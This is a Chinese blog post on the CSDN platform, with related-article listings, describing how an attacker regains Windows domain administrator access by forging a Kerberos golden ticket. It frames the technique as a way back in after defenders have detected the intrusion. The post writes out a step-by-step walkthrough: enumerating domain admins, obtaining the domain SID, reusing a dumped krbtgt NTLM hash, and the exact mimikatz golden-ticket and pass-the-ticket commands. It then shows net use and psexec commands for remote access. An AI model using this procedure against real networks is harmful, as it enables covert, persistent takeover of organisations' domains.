域渗透的金之钥匙

最新推荐文章于 2022-04-13 21:49:06 发布
最新推荐文章于 2022-04-13 21:49:06 发布
阅读量529 收藏 1
点赞数
分类专栏: 安全开发 实战篇 web安全 文章标签: 域渗透 金钥匙
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/91824633
版权
实战篇 同时被 3 个专栏收录
167 篇文章 4 订阅
订阅专栏
安全开发
153 篇文章 18 订阅
订阅专栏
web安全
97 篇文章 10 订阅
订阅专栏

在这里插入图片描述

0x00 废话连篇
最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的<<Fireeye Mandiant 2014 安全报告 Part1>> ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的(http://drops.wooyun.org/papers/576),不知道还有什么新方法,心中还有激情,如果想交流的朋友,可以加我聊聊。

0x01 金之钥匙
我原来发过一个微博说
在这里插入图片描述
这就是我说的金之钥匙,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候 又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

要重新拿回域管理员权限,首先要先知道域内的管理员有谁

C:\Users\hydra>net group "domain admins" /domain

我这里的实验环境,通过截图可以看到域管理员是administrator

我还要知道域SID是啥

c:\Users\hydra>whoami /user

我的域SID是

S-1-5-21-3883552807-251258116-2724407435

还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

在这里插入图片描述
然后该用神器mimikatz出场了,依次执行

mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt

到现在,我们又重新拥有域管理员权限了,可以验证下

E:\&gt;net use \\WIN-0DKN2AS0T2G\c$
E:\&gt;psexec.exe \\WIN-0DKN2AS0T2G cmd

在这里插入图片描述
0x02 后话闲扯
呃,感觉这个方法比https://blog.csdn.net/kclax个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。

Coisini、
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
员工福利系列模板-五险一之医疗模块问题解答.pdf
04-29
【员工福利系列模板-五险一之医疗模块问题解答】 在人力资源管理和公司福利政策中,五险一是企业必须为员工提供的基本社会保障。其中,“五险”指的是养老保险、医疗保险、失业保险、工伤保险和生育保险,而...
员工福利系列模板-五险一之公积模块问题解答.pdf
04-29
员工福利系列模板-五险一之公积模块问题解答.pdf
超详细的渗透过程!
热门推荐
xiaoi123的博客
05-02 1万+
大家好!我们在这个write up 里讲下几个不同的入侵 windows domian 时的横向操作。 内容不会过于深入,而会介绍一些基本技巧和流程. 为了保证测试客观性所以我将使用我们的测试对象 lock domain “REDHOOK”. 希望这会成为我们第一个关于 windows domian 的系列教程. 如果你要具体了解某些细节(比如kerberos 的 tickets)欢迎发email...
内网渗透分析工具BloodHound
LuckySec
04-13 5964
前言 当渗透进入内网后,利用BloodHound对庞大内网环境进行自动化信息搜集并整理分析数据,提高渗透效率。 0x01 BloodHound介绍 BloodHound是一款可视化图形分析环境中的关系的工具,以用图与线的形式,将内用户、计算机、组、Sessions、ACLs以及内所有相关用户、组、计算机、登陆信息、访问控制策略之间的关系更直观的展现在红队人员面前进行更便捷的分析内情况,更快速的在内提升自己的权限。它也可以使蓝队成员对己方网络系统进行更好的安全检测及保证的安全性。 Neo4j是一
渗透提权分析工具 BloodHound 1.3 中的ACL攻击路径介绍
weixin_34209406的博客
09-14 528
本文讲的是渗透提权分析工具 BloodHound 1.3 中的ACL攻击路径介绍, 简介和背景 2014年,Emmanuel Gras和Lucas Bouillot在“信息通信技术研讨会”(Symposium on Information and Communications)上发表了题为“Chemins decontrôleen environ...
12、强大的内网渗透提权分析工具——BloodHound
Fly_鹏程万里
06-14 1580
导语:简介和背景 在今年二月,我发布了一个名为“ PowerPath ” 的POC脚本,它整合了Will Schroeder的PowerView和Justin Warner的本地管理员衍生工具,图形理论以及Jim Truher(@jwtruher)为证明可以自动执行Active Directory。简介和背景在今年二月,我发布了一个名为“ PowerPath ” 的POC脚本,它整合了Will ...
员工福利系列模板-五险一之工伤模块问题解答.pdf
04-29
员工福利系列模板-五险一之工伤模块问题解答.pdf
员工福利系列模板-五险一之养老模块问题解答.pdf
04-29
【养老保险】 养老保险是五险一中的重要组成部分,旨在为劳动者提供老年生活保障。当个人达到法定退休年龄时,如果累计缴费满15年,便可以按月领取基本养老。如果缴费不足15年,有两种选择:一是继续缴费直至满...
员工福利系列模板-五险一之生育模块问题解答.pdf
04-29
【生育保险】是中国社会福利制度的重要组成部分,旨在保障劳动者在生育或计划生育过程中获得经济补偿和医疗服务。本篇主要讨论了五个城市的生育保险相关政策,包括成都、上海、北京、东莞和广州,涉及报销范围、产假...
渗透之(黄票据利用)
cj_Hydra's Blog
02-13 2919
前言: 这里先介绍下Kerberos协议: Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。 在Kerberos协议中主要是有三个角色的存在: 1:访问服务的Client(用户的机器客户端) 2:提供服务的Server(服务端) 3:KDC(Key Distribution Center)密钥分发中心其中K...
安全评估以及加固方案
Shanfenglan's blog
01-20 1万+
文章目录1.前言2. 评估结果分析与加固方案1. 用户帐户问题2. 密码策略3. Tombstone lifetime和AD backup参考文章 1.前言 在内任何一台机器上通过powershell脚本对中对一些基本问题进行检测,检测的目标点如下: 用户帐户问题 密码策略 Tombstone lifetime和AD备份 信任问题 重复的SPN 组策略首选项密码 管或特权用户 KRBTGT帐户-需要定期重制密码 Kerberos委派-配置错误可导致windows委派攻击 组策略对象所有者-配置错
渗透——哈希传递、黄票据
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-30 851
渗透 1. 安装 接着点击安装向导 加入: 需要设置dns服务器为控机 控可以登陆任意中的电脑 Windows认证协议 - Kerberos,也可以叫做票据 我们查看控 在cmd输入 net user /domain 还可以在dns里查看,一般dns都是控机 当我们获取到了administator的权限的时候,我们可以利用windows官方的工具去提权 指令: psexec -i -d -s cmd.exe//获取权限 然后再次输入net user /domain,就可以获取
中黄票据
https://www.cnblogs.com/zpchcbd/
09-11 1256
票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。 krbtgt账户:每个控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x00 票据利用条件: 控中krbtgt账户NTLM密码哈希 中的sid值 一台中主机 与其说是一种攻击方式,不如说是一种后门,当控权限掉后,再重新获取权限,因为常见...
渗透之通过DCSync获取权限并制作黄票据
weixin_30886233的博客
03-02 768
环境背景 账号: admin 没有管权限 admin02 有管权限 administrator 有管权限 模拟渗透过程: 利用任意方法已经登录到client1(Windows 7),在client1上获取到了admin02的权限,进行DCSync获取krbtgt的hash,制作黄票据,并远程IPC访问控Windows Server 2012 登录Client1抓取管凭证 ...
渗透技巧
cnbird's blog
01-25 3467
1. psloggedon.exe  sysinternals.com 2.netsess.exe  www.joeware.net/freetools/ 利用技术: https://msdn.microsoft.com/en-us/library/windows/desktop/bb525382(v=vs.85).aspx 3.pvefindaduser.exe https://
今日头条引流小白入门视频解析下载支持今日头条快手抖音视频去水印软件批量处理去重消重去水印去logo...
歌乐自媒体软件
05-24 3177
今日头条自媒体运营推广视频教程学习资料短视频运营从零到精通 今日头条趣东方头条凤凰新浪看点网易企鹅UC大鱼一点资讯自媒体快传视频处理软件 今日头条推广视频教程自媒体推广短视频教程今日头条引流小白入门 视频解析下载支持今日头条快手抖音火山映客陌陌西瓜美拍微博等 快手今日头条火山秒拍陌陌美拍抖音小咖秀视频下载软件神器或手机 视频去重消重伪原创 批量处理短视频 小视频...
渗透分析神器BloodHound
weixin_30530523的博客
03-11 496
一、安装过程: 1、首先安装JDK,要求是JDK8 JDK8下载地址 windows下按照提示自动安装好久可以了 2、安装neo4j neo4j图数据库下载地址 下载好后,进入对应的目录在命令行运行如下命令 cd D:\neo4j-community-3.5.3\bin\ .\neo4j.bat console 效果如下,打开浏览器证明已经好了 2019-03-11 12:09:38.87...
AD的另一种渗透姿势:Kerberoast
weixin_34268169的博客
09-20 472
本文讲的是AD的另一种渗透姿势:Kerberoast,译者注:建议读者在阅读此文之前,最好先去了解一下Kerberos协议的通信过程和“黄票证”,“白银票证”,“万能钥匙”的攻击原理和方法以及“Mimikatz”的一些用法。 可以参考以下几篇文章: 渗透钥匙–Mickeyhttp://t.cn/RJkooX3 Mimikatz非官方...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值